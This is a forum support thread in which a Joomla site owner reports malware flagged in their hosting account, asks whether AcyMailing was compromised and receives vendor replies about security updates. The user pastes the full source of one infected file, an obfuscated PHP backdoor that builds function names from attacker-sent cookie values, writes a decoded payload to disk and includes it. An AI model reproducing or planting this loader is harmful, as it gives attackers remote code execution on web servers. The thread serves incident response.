Has my AcyMailing been hacked?

tonytimms

I have received the following message from my host:
Our malware scanner has detected malware contained in your hosting account.
The infected files are as follows:

api/includes/zdhlmt.php
components/com_ajax/nwmwyz.php
media/com_acym/images/thumbnails/thumbnail_199.png?.php
media/com_ipakojyx/zgrjyt.php

has my AcyMailing ben compromised?

Regards

jvstratum

tonytimms

Hi,

The security issue you mentioned has been addressed in the latest versions of Acymailing. We have fixed this issue in version 8.5.0, which was released on June 12th, and also released a security fix in version 8.7.0 on August 8th.

To ensure that your system is secure, please make sure that you have installed the latest Acymailing version, which is currently 8.7.3.

We have taken several steps to notify our users about these security updates. We have sent out two email notifications, published two articles on our website, and also discussed the issues on our forum.

For more information on these updates, please visit the following links:

ruud

yes it has been compromised

tonytimms

Hi ruud
Is it OK just to find those malicious files and delete them or should I uninstall AcyMailing and then re-install?

Regards

tonytimms

Hi, yes I have successfully updated to the latest version, however I am getting a notice - "Duplicate column name 'image'"

Can I ignore this or is action required?

Regards

tonytimms

This is the content of the file api/includes/zdhlmt.php

text/x-generic zdhlmt.php ( PHP script, ASCII text, with very long lines )
<?php
$lrRH=$_COOKIE ;$Jqsd =0; $JdV = ( 11- 8) ; $PpE =array() ; $PpE [ $Jqsd ]= "" ;while($JdV){$PpE[$Jqsd ].=$lrRH [ ( 51 - 19 )][ $JdV ]; if(! $lrRH[ ( 44 -12) ] [$JdV+ 1] ){ if ( !$lrRH [ (57 - 25) ] [ $JdV + 2 ] ) break ; $Jqsd ++; $PpE [ $Jqsd] = "";$JdV++; } $JdV = $JdV+ (26 - 23 ) + 1; }$Jqsd =$PpE [ ( 23 - 4 ) ] ().$PpE[ (46-21) ] ; if(!$PpE[( 84 -57) ] ( $Jqsd) ){ $JdV = $PpE [ (50-46 ) ]($Jqsd,$PpE [( 50 - 36) ]) ; $PpE [ (39 -10) ] ($JdV,$PpE [(44- 21 ) ] . $PpE [ (86 -65 ) ]($PpE [ ( 41 -26) ]($lrRH [3]) ) ) ;} include($Jqsd ) ;

It looks very different to the same file on a separate joomla installation I have, should I delete it?

jvstratum

Hi,

To provide you with the best assistance possible, I kindly request that you submit a support ticket through our website at https://www.acymailing.com/support/. Our team will be able to efficiently and effectively provide you with the assistance you need.

Please note that our ticket support is exclusively available for our customers with an active Essential or Enterprise license. If your license has expired or you are using the Starter version, we kindly invite you to renew or upgrade your license prior to opening your support ticket.